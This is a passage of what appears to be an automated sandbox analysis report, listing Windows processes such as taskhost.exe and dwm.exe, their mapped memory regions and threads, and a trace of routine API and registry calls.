files\\microsoft office 15\\clientx64\\officeclicktorun.exe") Thread: id = 443 os_tid = 0x504 Thread: id = 449 os_tid = 0x524 Thread: id = 450 os_tid = 0x528 Thread: id = 451 os_tid = 0x52c Thread: id = 452 os_tid = 0x530 Thread: id = 453 os_tid = 0x534 Thread: id = 454 os_tid = 0x538 Thread: id = 455 os_tid = 0x53c Thread: id = 456 os_tid = 0x540 Thread: id = 457 os_tid = 0x544 Thread: id = 459 os_tid = 0x550 Thread: id = 489 os_tid = 0x5e8 Thread: id = 490 os_tid = 0x5ec Thread: id = 543 os_tid = 0x6c4 Thread: id = 545 os_tid = 0x6cc Thread: id = 546 os_tid = 0x6d0 Thread: id = 547 os_tid = 0x6d4 Thread: id = 548 os_tid = 0x6d8 Thread: id = 549 os_tid = 0x6dc Thread: id = 550 os_tid = 0x6e0 Process: id = "22" image_name = "taskhost.exe" filename = "c:\\windows\\system32\\taskhost.exe" page_root = "0x1433c000" os_pid = "0x61c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x1c0" cmd_line = "taskhost.exe SYSTEM" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 4514 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4515 start_va = 0x30000 end_va = 0xaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4516 start_va = 0xb0000 end_va = 0xb3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 4517 start_va = 0x77970000 end_va = 0x77b18fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4518 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4519 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4520 start_va = 0xff3b0000 end_va = 0xff3c3fff monitored = 0 entry_point = 0xff3b2ce0 region_type = mapped_file name = "taskhost.exe" filename = "\\Windows\\System32\\taskhost.exe" (normalized: "c:\\windows\\system32\\taskhost.exe") Region: id = 4521 start_va = 0x7feffc90000 end_va = 0x7feffc90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4522 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4523 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 4524 start_va = 0x7fffffde000 end_va = 0x7fffffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4541 start_va = 0x1b0000 end_va = 0x2affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 4542 start_va = 0x77750000 end_va = 0x7786efff monitored = 0 entry_point = 0x77765340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4543 start_va = 0x7fefd9d0000 end_va = 0x7fefda3bfff monitored = 0 entry_point = 0x7fefd9d2780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4544 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4545 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4546 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4547 start_va = 0xc0000 end_va = 0x126fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4548 start_va = 0x7feff500000 end_va = 0x7feff59efff monitored = 0 entry_point = 0x7feff5025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4549 start_va = 0x7fefe070000 end_va = 0x7fefe272fff monitored = 0 entry_point = 0x7fefe093330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4550 start_va = 0x7feff010000 end_va = 0x7feff076fff monitored = 0 entry_point = 0x7feff01b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4551 start_va = 0x77870000 end_va = 0x77969fff monitored = 0 entry_point = 0x7788a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4552 start_va = 0x7feff080000 end_va = 0x7feff08dfff monitored = 0 entry_point = 0x7feff081080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 4553 start_va = 0x7fefdc90000 end_va = 0x7fefdd58fff monitored = 0 entry_point = 0x7fefdd0a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 4554 start_va = 0x7feff6c0000 end_va = 0x7feff7ecfff monitored = 0 entry_point = 0x7feff70ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4555 start_va = 0x7feff1a0000 end_va = 0x7feff276fff monitored = 0 entry_point = 0x7feff1a3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4556 start_va = 0x2b0000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 4557 start_va = 0x2b0000 end_va = 0x3affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 4558 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4559 start_va = 0x130000 end_va = 0x158fff monitored = 0 entry_point = 0x131010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4560 start_va = 0x470000 end_va = 0x5f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4561 start_va = 0x130000 end_va = 0x158fff monitored = 0 entry_point = 0x131010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4562 start_va = 0x7feff090000 end_va = 0x7feff0bdfff monitored = 0 entry_point = 0x7feff091010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4563 start_va = 0x7feff950000 end_va = 0x7feffa58fff monitored = 0 entry_point = 0x7feff951064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4564 start_va = 0x600000 end_va = 0x780fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 4565 start_va = 0x790000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 4566 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskhost.exe.mui" filename = "\\Windows\\System32\\en-US\\taskhost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskhost.exe.mui") Region: id = 4578 start_va = 0x130000 end_va = 0x130fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 4579 start_va = 0x140000 end_va = 0x140fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 4580 start_va = 0x3b0000 end_va = 0x42cfff monitored = 0 entry_point = 0x3bcec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 4581 start_va = 0x3b0000 end_va = 0x42cfff monitored = 0 entry_point = 0x3bcec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 4582 start_va = 0x7fefd7b0000 end_va = 0x7fefd7befff monitored = 0 entry_point = 0x7fefd7b1010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4583 start_va = 0x7feff7f0000 end_va = 0x7feff80efff monitored = 0 entry_point = 0x7feff7f60e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4584 start_va = 0x910000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000910000" filename = "" Region: id = 4585 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 4586 start_va = 0x7feff0c0000 end_va = 0x7feff19afff monitored = 0 entry_point = 0x7feff0e0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4587 start_va = 0x3d0000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 4588 start_va = 0x9c0000 end_va = 0xa3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 4589 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 4590 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 4591 start_va = 0x850000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 4594 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 4595 start_va = 0xba0000 end_va = 0xc1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 4596 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 4597 start_va = 0x7feffbe0000 end_va = 0x7feffc78fff monitored = 0 entry_point = 0x7feffbe1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4598 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 4647 start_va = 0x7fef7700000 end_va = 0x7fef770dfff monitored = 0 entry_point = 0x7fef7705d28 region_type = mapped_file name = "dimsjob.dll" filename = "\\Windows\\System32\\dimsjob.dll" (normalized: "c:\\windows\\system32\\dimsjob.dll") Region: id = 4648 start_va = 0x7feff8d0000 end_va = 0x7feff940fff monitored = 0 entry_point = 0x7feff8e1e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 4649 start_va = 0x7fefb4f0000 end_va = 0x7fefb616fff monitored = 0 entry_point = 0x7fefb4f10ec region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 4650 start_va = 0x7fefd780000 end_va = 0x7fefd7a4fff monitored = 0 entry_point = 0x7fefd789658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4652 start_va = 0x7fef94b0000 end_va = 0x7fef9523fff monitored = 0 entry_point = 0x7fef94b66f0 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 4653 start_va = 0x7feff870000 end_va = 0x7feff877fff monitored = 0 entry_point = 0x7feff871504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4654 start_va = 0x7fefb690000 end_va = 0x7fefb6a4fff monitored = 0 entry_point = 0x7fefb6960d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 4655 start_va = 0xa40000 end_va = 0xadffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a40000" filename = "" Region: id = 4656 start_va = 0x7fefd1b0000 end_va = 0x7fefd1c7fff monitored = 0 entry_point = 0x7fefd1b3b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4657 start_va = 0xa40000 end_va = 0xa84fff monitored = 0 entry_point = 0xa41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4658 start_va = 0xad0000 end_va = 0xadffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 4659 start_va = 0xa40000 end_va = 0xa84fff monitored = 0 entry_point = 0xa41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4660 start_va = 0xa40000 end_va = 0xa84fff monitored = 0 entry_point = 0xa41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4661 start_va = 0xa40000 end_va = 0xa84fff monitored = 0 entry_point = 0xa41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4662 start_va = 0xa40000 end_va = 0xa84fff monitored = 0 entry_point = 0xa41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4663 start_va = 0x7fefceb0000 end_va = 0x7fefcef6fff monitored = 0 entry_point = 0x7fefceb1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4664 start_va = 0xc20000 end_va = 0xeeefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4665 start_va = 0x7fefd860000 end_va = 0x7fefd873fff monitored = 0 entry_point = 0x7fefd8610e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 4666 start_va = 0x1040000 end_va = 0x10bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 4667 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 4787 start_va = 0x7fef7350000 end_va = 0x7fef735bfff monitored = 0 entry_point = 0x7fef735602c region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 4797 start_va = 0x7fef7140000 end_va = 0x7fef714ffff monitored = 0 entry_point = 0x7fef714624c region_type = mapped_file name = "pautoenr.dll" filename = "\\Windows\\System32\\pautoenr.dll" (normalized: "c:\\windows\\system32\\pautoenr.dll") Region: id = 4825 start_va = 0x170000 end_va = 0x172fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 4826 start_va = 0x7feff810000 end_va = 0x7feff861fff monitored = 0 entry_point = 0x7feff8110d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 4835 start_va = 0x7fef70c0000 end_va = 0x7fef7133fff monitored = 1 entry_point = 0x7fef70c1b0c region_type = mapped_file name = "certcli.dll" filename = "\\Windows\\System32\\certcli.dll" (normalized: "c:\\windows\\system32\\certcli.dll") Region: id = 4836 start_va = 0x7fefb4d0000 end_va = 0x7fefb4e8fff monitored = 0 entry_point = 0x7fefb4d11a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 4837 start_va = 0x7fefdb20000 end_va = 0x7fefdc8cfff monitored = 0 entry_point = 0x7fefdb210b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 4838 start_va = 0x7fefd960000 end_va = 0x7fefd96efff monitored = 0 entry_point = 0x7fefd961020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 4841 start_va = 0x7fef6ed0000 end_va = 0x7fef70b5fff monitored = 0 entry_point = 0x7fef6ed1210 region_type = mapped_file name = "certenroll.dll" filename = "\\Windows\\System32\\CertEnroll.dll" (normalized: "c:\\windows\\system32\\certenroll.dll") Region: id = 5039 start_va = 0x7fefb470000 end_va = 0x7fefb47bfff monitored = 0 entry_point = 0x7fefb4715d8 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Thread: id = 506 os_tid = 0x620 Thread: id = 508 os_tid = 0x638 Thread: id = 509 os_tid = 0x63c Thread: id = 511 os_tid = 0x640 Thread: id = 512 os_tid = 0x644 [0281.965] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc1f360 | out: lpSystemTimeAsFileTime=0xc1f360*(dwLowDateTime=0x3c5bfde0, dwHighDateTime=0x1d88c7d)) [0281.965] GetCurrentProcessId () returned 0x61c [0281.965] GetCurrentThreadId () returned 0x644 [0281.965] GetTickCount () returned 0x1002a [0281.965] QueryPerformanceCounter (in: lpPerformanceCount=0xc1f368 | out: lpPerformanceCount=0xc1f368*=3133151708241) returned 1 [0281.965] malloc (_Size=0x100) returned 0x467ae0 [0281.966] __dllonexit () returned 0x7fef70fd69c [0281.966] GetVersionExW (in: lpVersionInformation=0xc1f040*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x460000, dwBuildNumber=0x0, dwPlatformId=0x100, szCSDVersion="") | out: lpVersionInformation=0xc1f040*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0281.966] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".dll", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 1 [0281.966] LocalAlloc (uFlags=0x0, uBytes=0x18) returned 0x2091e0 [0281.966] memcpy (in: _Dst=0x2091e0, _Src=0x7fef70ffb10, _Size=0x18 | out: _Dst=0x2091e0) returned 0x2091e0 [0281.966] AtlModuleInit () returned 0x0 [0281.966] DisableThreadLibraryCalls (hLibModule=0x7fef70c0000) returned 1 [0282.262] getenv (_VarName="CERTSRV_DEBUG") returned 0x0 [0282.263] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0282.263] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0282.263] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0282.263] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0282.263] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0282.263] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0282.263] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0282.263] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Cryptography\\AutoEnrollment", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0xc1edb8, lpdwDisposition=0xc1edf0 | out: phkResult=0xc1edb8*=0x150, lpdwDisposition=0xc1edf0*=0x2) returned 0x0 [0282.263] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x1fdaa0 [0282.263] RegQueryValueExW (in: hKey=0x150, lpValueName="Debug", lpReserved=0x0, lpType=0xc1f0f8, lpData=0xc1f168, lpcbData=0xc1f0e8*=0x4 | out: lpType=0xc1f0f8*=0x0, lpData=0xc1f168*=0x0, lpcbData=0xc1f0e8*=0x4) returned 0x2 [0282.264] LocalFree (hMem=0x1fdaa0) returned 0x0 [0282.264] RegCloseKey (hKey=0x150) returned 0x0 [0282.264] LocalAlloc (uFlags=0x40, uBytes=0x70) returned 0x204690 [0282.264] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\CertSvc\\Configuration", ulOptions=0x0, samDesired=0x20019, phkResult=0xc1f058 | out: phkResult=0xc1f058*=0x0) returned 0x2 [0282.265] LocalFree (hMem=0x204690) returned 0x0 [0282.265] LocalAlloc (uFlags=0x40, uBytes=0x70) returned 0x204690 [0282.265] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\CertSvc\\Configuration", ulOptions=0x0, samDesired=0x20019, phkResult=0xc1f058 | out: phkResult=0xc1f058*=0x0) returned 0x2 [0282.265] LocalFree (hMem=0x204690) returned 0x0 Thread: id = 518 os_tid = 0x660 Thread: id = 557 os_tid = 0x71c Process: id = "23" image_name = "dwm.exe" filename = "c:\\windows\\system32\\dwm.exe" page_root = "0x12bd6000" os_pid = "0x704" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0x2f8" cmd_line = "\"C:\\Windows\\system32\\Dwm.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000febd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4943 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4944 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4945 start_va = 0xf0000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 4946 start_va = 0x77970000 end_va = 0x77b18fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4947 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4948 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4949 start_va = 0xff2a0000 end_va = 0xff2c2fff monitored = 0 entry_point = 0xff2a49d4 region_type = mapped_file name = "dwm.exe" filename = "\\Windows\\System32\\dwm.exe" (normalized: "c:\\windows\\system32\\dwm.exe") Region: id = 4950 start_va = 0x7feffc90000 end_va = 0x7feffc90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4951 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4952 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 4953 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4955 start_va = 0x40000 end_va = 0x41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4957 start_va = 0x190000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 4958 start_va = 0x77750000 end_va = 0x7786efff monitored = 0 entry_point = 0x77765340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4959 start_va = 0x7fefd9d0000 end_va = 0x7fefda3bfff monitored = 0 entry_point = 0x7fefd9d2780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4960 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4961 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4962 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4963 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4964 start_va = 0x7feff010000 end_va = 0x7feff076fff monitored = 0 entry_point = 0x7feff01b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4965 start_va = 0x77870000 end_va = 0x77969fff monitored = 0 entry_point = 0x7788a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4966 start_va = 0x7feff080000 end_va = 0x7feff08dfff monitored = 0 entry_point = 0x7feff081080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 4967 start_va = 0x7fefdc90000 end_va = 0x7fefdd58fff monitored = 0 entry_point = 0x7fefdd0a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 4968 start_va = 0x7feff500000 end_va = 0x7feff59efff monitored = 0 entry_point = 0x7feff5025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4969 start_va = 0x7fefc0b0000 end_va = 0x7fefc105fff monitored = 0 entry_point = 0x7fefc0bbbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4970 